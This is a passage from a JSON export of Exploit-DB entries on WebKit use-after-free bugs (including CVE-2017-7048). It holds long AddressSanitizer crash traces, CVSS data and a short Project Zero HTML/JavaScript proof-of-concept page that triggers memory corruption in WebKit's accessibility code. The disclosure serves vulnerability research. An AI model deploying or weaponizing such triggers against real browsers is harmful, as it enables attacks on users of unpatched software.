(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)\r\n #6 0x108b1f7e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)\r\n #7 0x108b20287 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f287)\r\n #8 0x108ec59ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)\r\n #9 0x108ec2d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)\r\n #10 0x108b3e493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)\r\n #11 0x1090b25c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)\r\n #12 0x108bdd093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)\r\n #13 0x108b9c386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)\r\n #14 0x10862b997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #15 0x1086252aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #16 0x10afacc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #17 0x105ec22eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #18 0x105ec5689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #19 0x105ec4ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #20 0x105765683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n #21 0x10550f3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)\r\n #22 0x105518888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)\r\n #23 0x1162c0312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)\r\n #24 0x1162c0d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)\r\n #25 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)\r\n #26 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)\r\n #27 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)\r\n #28 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)\r\n #29 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)\r\n #30 0x7fffd24b6cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)\r\n #31 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)\r\n #32 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)\r\n #33 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)\r\n #34 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)\r\n #35 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)\r\n #36 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)\r\n #37 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)\r\n #38 0x10316c56c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)\r\n #39 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)\r\n\r\n0x608000090ac8 is located 40 bytes inside of 96-byte region [0x608000090aa0,0x608000090b00)\r\nfreed by thread T0 here:\r\n #0 0x1031d4294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)\r\n #1 0x116307f30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)\r\n #2 0x10a79d874 in WebCore::RenderBlock::createFirstLetterRenderer(WebCore::RenderElement*, WebCore::RenderText*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ec874)\r\n #3 0x10a79e15a in WebCore::RenderBlock::updateFirstLetter(WebCore::RenderBlock::RenderTreeMutationIsAllowed) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ed15a)\r\n #4 0x10a783761 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d2761)\r\n #5 0x10a80333f in WebCore::RenderBlockFlow::layoutLineBoxes(bool, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x245233f)\r\n #6 0x10a7ca957 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419957)\r\n #7 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #8 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #9 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #10 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #11 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #12 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #13 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #14 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #15 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #16 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #17 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #18 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #19 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #20 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #21 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #22 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #23 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #24 0x10ab8536d in WebCore::RenderView::layoutContent(WebCore::LayoutState const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d436d)\r\n #25 0x10ab85b74 in WebCore::RenderView::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d4b74)\r\n #26 0x108f00943 in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb4f943)\r\n #27 0x108b1a1d0 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7691d0)\r\n #28 0x108b207b2 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f7b2)\r\n #29 0x108cd3b21 in WebCore::Element::innerText() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x922b21)\r\n\r\npreviously allocated by thread T0 here:\r\n #0 0x1031d3d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)\r\n #1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)\r\n #2 0x116311ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)\r\n #3 0x116306c4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)\r\n #4 0x11629c437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)\r\n #5 0x11629b768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)\r\n #6 0x1085bb548 in WebCore::RenderObject::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20a548)\r\n #7 0x10b157c4d in WebCore::RenderPtr<WebCore::RenderText> WebCore::createRenderer<WebCore::RenderText, WebCore::Text&, WTF::String const&>(WebCore::Text&&&, WTF::String const&&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da6c4d)\r\n #8 0x10b157aae in WebCore::Text::createTextRenderer(WebCore::RenderStyle const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da6aae)\r\n #9 0x10ab7d6a4 in WebCore::createTextRenderer(WebCore::Text&, WebCore::RenderTreePosition&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc6a4)\r\n #10 0x10ab7b057 in WebCore::RenderTreeUpdater::updateTextRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca057)\r\n #11 0x10ab7abfa in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9bfa)\r\n #12 0x10ab7a47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)\r\n #13 0x108b1f7e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)\r\n #14 0x108b20287 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f287)\r\n #15 0x108ec59ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)\r\n #16 0x108ec2d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)\r\n #17 0x108b3e493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)\r\n #18 0x1090b25c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)\r\n #19 0x108bdd093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)\r\n #20 0x108b9c386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)\r\n #21 0x10862b997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #22 0x1086252aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #23 0x10afacc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #24 0x105ec22eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #25 0x105ec5689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #26 0x105ec4ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #27 0x105765683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n #28 0x10550f3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)\r\n #29 0x105518888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)\r\n\r\nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6aa25) in WebCore::RenderObject::RenderObjectBitfields::hasLayer() const\r\nShadow bytes around the buggy address:\r\n 0x1c1000012100: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012110: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012120: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c1000012130: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c1000012140: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa\r\n=>0x1c1000012150: fa fa fa fa fd fd fd fd fd[fd]fd fd fd fd fd fd\r\n 0x1c1000012160: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012170: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012180: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012190: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c10000121a0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==30692==ABORTING\r\n-->", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/42365/"}, {"lastseen": "2017-07-24T19:42:10", "description": "WebKit - 'WebCore::AccessibilityNodeObject::textUnderElement' Use-After-Free. CVE-2017-7048. Dos exploit for Multiple platform. Tags: Use After Free", "published": "2017-07-24T00:00:00", "type": "exploitdb", "title": "WebKit - 'WebCore::AccessibilityNodeObject::textUnderElement' Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7048"], "modified": "2017-07-24T00:00:00", "id": "EDB-ID:42360", "href": "https://www.exploit-db.com/exploits/42360/", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1249\r\n\r\nThere is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.\r\n\r\nNote that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default.\r\n\r\nPoC:\r\n\r\n=================================================================\r\n-->\r\n\r\n<script>\r\nfunction go() {\r\n li.hidden = true;\r\n dir.setAttribute(\"aria-labeledby\", \"map\");\r\n}\r\n</script>\r\n<body onload=go()>\r\n<dir id=\"dir\">\r\n<li id=\"li\">\r\n<map id=\"map\">\r\n<area></area>\r\n\r\n<!--\r\n=================================================================\r\n\r\nASan log:\r\n\r\n=================================================================\r\n==728==ERROR: AddressSanitizer: heap-use-after-free on address 0x6080000908a0 at pc 0x000109f2cbb5 bp 0x7fff5e08a430 sp 0x7fff5e08a428\r\nREAD of size 8 at 0x6080000908a0 thread T0\r\n==728==WARNING: invalid path to external symbolizer!\r\n==728==WARNING: Failed to use and restart external symbolizer!\r\n #0 0x109f2cbb4 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25bb4)\r\n #1 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273)\r\n #2 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0)\r\n #3 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3)\r\n #4 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e)\r\n #5 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9)\r\n #6 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c)\r\n #7 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550)\r\n #8 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab)\r\n #9 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1)\r\n #10 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f)\r\n #11 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d)\r\n #12 0x10a820041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041)\r\n #13 0x10a826268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268)\r\n #14 0x10a82607c in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c)\r\n #15 0x10a81f8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7)\r\n #16 0x10a81f6c1 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9186c1)\r\n #17 0x10b463b93 in WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155cb93)\r\n #18 0x10b4555d8 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e5d8)\r\n #19 0x10b455441 in WebCore::jsElementPrototypeFunctionSetAttribute(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e441)\r\n #20 0x279e6e001027 (<unknown module>)\r\n #21 0x115e2934a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)\r\n #22 0x115e2934a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)\r\n #23 0x115e2291a in vmEntryToJavaScript 